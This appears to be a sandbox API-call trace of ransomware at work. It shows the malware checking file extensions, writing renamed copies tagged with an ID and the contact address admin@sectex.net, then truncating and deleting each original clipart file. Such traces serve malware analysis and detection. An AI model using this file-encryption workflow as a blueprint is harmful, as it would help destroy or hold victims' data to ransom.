	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString=".dbf") returned 4
	[0158.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString=".1cd") returned 4
	[0158.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString=".jpg") returned 4
	[0158.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString=".doc") returned 4
	[0158.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString=".docx") returned 5
	[0158.614] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.614] lstrlenW (lpString=".pdf") returned 4
	[0158.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString=".xls") returned 4
	[0158.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.614] lstrlenW (lpString=".xlsx") returned 5
	[0158.614] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.614] lstrlenW (lpString=".ppt") returned 4
	[0158.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.614] lstrlenW (lpString=".zip") returned 4
	[0158.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.614] lstrlenW (lpString=".rar") returned 4
	[0158.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString=".bz2") returned 4
	[0158.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString=".7z") returned 3
	[0158.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.614] lstrlenW (lpString=".dbf") returned 4
	[0158.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.614] lstrlenW (lpString=".1cd") returned 4
	[0158.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.614] lstrlenW (lpString=".jpg") returned 4
	[0158.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.615] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.615] lstrlenW (lpString="J0105384.WMF") returned 12
	[0158.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0158.615] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5880) returned 1
	[0158.615] CloseHandle (hObject=0x37c) returned 1
	[0158.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf")) returned 0x20
	[0158.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0158.616] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.616] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.616] GetLastError () returned 0x0
	[0158.616] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x16f8, lpOverlapped=0x0) returned 1
	[0158.641] WriteFile (in: hFile=0x3f0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1700, lpOverlapped=0x0) returned 1
	[0158.642] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.642] WriteFile (in: hFile=0x3f0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.642] SetEndOfFile (hFile=0x3f0) returned 1
	[0158.642] CloseHandle (hObject=0x3f0) returned 1
	[0158.643] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.643] SetEndOfFile (hFile=0x37c) returned 1
	[0158.645] CloseHandle (hObject=0x37c) returned 1
	[0158.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.645] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf")) returned 1
	[0158.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.670] lstrlenW (lpString=".doc") returned 4
	[0158.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.670] lstrlenW (lpString=".docx") returned 5
	[0158.670] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0158.670] lstrlenW (lpString=".pdf") returned 4
	[0158.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.670] lstrlenW (lpString=".xls") returned 4
	[0158.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.670] lstrlenW (lpString=".xlsx") returned 5
	[0158.670] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0158.670] lstrlenW (lpString=".ppt") returned 4
	[0158.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.670] lstrlenW (lpString=".zip") returned 4
	[0158.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.670] lstrlenW (lpString=".rar") returned 4
	[0158.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.670] lstrlenW (lpString=".bz2") returned 4
	[0158.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.670] lstrlenW (lpString=".7z") returned 3
	[0158.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString=".dbf") returned 4
	[0158.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString=".1cd") returned 4
	[0158.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString=".jpg") returned 4
	[0158.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString=".doc") returned 4
	[0158.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString=".docx") returned 5
	[0158.671] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0158.671] lstrlenW (lpString=".pdf") returned 4
	[0158.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString=".xls") returned 4
	[0158.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.671] lstrlenW (lpString=".xlsx") returned 5
	[0158.671] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0158.671] lstrlenW (lpString=".ppt") returned 4
	[0158.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.671] lstrlenW (lpString=".zip") returned 4
	[0158.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.671] lstrlenW (lpString=".rar") returned 4
	[0158.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString=".bz2") returned 4
	[0158.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.671] lstrlenW (lpString=".7z") returned 3
	[0158.672] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.672] lstrlenW (lpString=".dbf") returned 4
	[0158.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.672] lstrlenW (lpString=".1cd") returned 4
	[0158.672] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 63
	[0158.672] lstrlenW (lpString=".jpg") returned 4
	[0158.672] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.672] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.672] lstrlenW (lpString="J0105388.WMF") returned 12
	[0158.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.837] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8252) returned 1
	[0158.837] CloseHandle (hObject=0x388) returned 1
	[0158.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf")) returned 0x20
	[0158.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.949] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.949] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.950] GetLastError () returned 0x0
	[0158.951] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x203c, lpOverlapped=0x0) returned 1
	[0158.970] WriteFile (in: hFile=0x25c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2040, lpOverlapped=0x0) returned 1
	[0158.971] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.971] WriteFile (in: hFile=0x25c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.971] SetEndOfFile (hFile=0x25c) returned 1
	[0158.971] CloseHandle (hObject=0x25c) returned 1
	[0158.971] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.971] SetEndOfFile (hFile=0x1b4) returned 1
	[0158.973] CloseHandle (hObject=0x1b4) returned 1
	[0158.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.988] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf")) returned 1
	[0159.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.019] lstrlenW (lpString=".doc") returned 4
	[0159.019] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.019] lstrlenW (lpString=".docx") returned 5
	[0159.019] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.019] lstrlenW (lpString=".pdf") returned 4
	[0159.019] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.019] lstrlenW (lpString=".xls") returned 4
	[0159.019] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.019] lstrlenW (lpString=".xlsx") returned 5
	[0159.019] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.020] lstrlenW (lpString=".ppt") returned 4
	[0159.020] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString=".zip") returned 4
	[0159.020] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.020] lstrlenW (lpString=".rar") returned 4
	[0159.020] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString=".bz2") returned 4
	[0159.020] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString=".7z") returned 3
	[0159.020] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString=".dbf") returned 4
	[0159.020] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString=".1cd") returned 4
	[0159.020] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString=".jpg") returned 4
	[0159.020] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.020] lstrlenW (lpString=".doc") returned 4
	[0159.020] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString=".docx") returned 5
	[0159.020] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.020] lstrlenW (lpString=".pdf") returned 4
	[0159.020] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.020] lstrlenW (lpString=".xls") returned 4
	[0159.020] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.020] lstrlenW (lpString=".xlsx") returned 5
	[0159.021] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.021] lstrlenW (lpString=".ppt") returned 4
	[0159.021] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.021] lstrlenW (lpString=".zip") returned 4
	[0159.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.021] lstrlenW (lpString=".rar") returned 4
	[0159.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.021] lstrlenW (lpString=".bz2") returned 4
	[0159.021] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.021] lstrlenW (lpString=".7z") returned 3
	[0159.021] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.021] lstrlenW (lpString=".dbf") returned 4
	[0159.021] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.021] lstrlenW (lpString=".1cd") returned 4
	[0159.021] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 63
	[0159.021] lstrlenW (lpString=".jpg") returned 4
	[0159.021] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.021] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.021] lstrlenW (lpString="J0105490.WMF") returned 12
	[0159.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.022] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=18728) returned 1
	[0159.022] CloseHandle (hObject=0x388) returned 1
	[0159.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf")) returned 0x20
	[0159.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.022] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.022] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.023] GetLastError () returned 0x0
	[0159.023] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4928, lpOverlapped=0x0) returned 1
	[0159.066] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4930, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4930, lpOverlapped=0x0) returned 1
	[0159.067] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.067] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.067] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.068] CloseHandle (hObject=0x1d8) returned 1
	[0159.068] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.068] SetEndOfFile (hFile=0x388) returned 1
	[0159.070] CloseHandle (hObject=0x388) returned 1
	[0159.070] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf")) returned 1
	[0159.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.127] lstrlenW (lpString=".doc") returned 4
	[0159.127] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.127] lstrlenW (lpString=".docx") returned 5
	[0159.127] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.127] lstrlenW (lpString=".pdf") returned 4
	[0159.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.127] lstrlenW (lpString=".xls") returned 4
	[0159.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.127] lstrlenW (lpString=".xlsx") returned 5
	[0159.127] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.127] lstrlenW (lpString=".ppt") returned 4
	[0159.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.127] lstrlenW (lpString=".zip") returned 4
	[0159.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.127] lstrlenW (lpString=".rar") returned 4
	[0159.128] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString=".bz2") returned 4
	[0159.128] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString=".7z") returned 3
	[0159.128] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString=".dbf") returned 4
	[0159.128] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString=".1cd") returned 4
	[0159.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
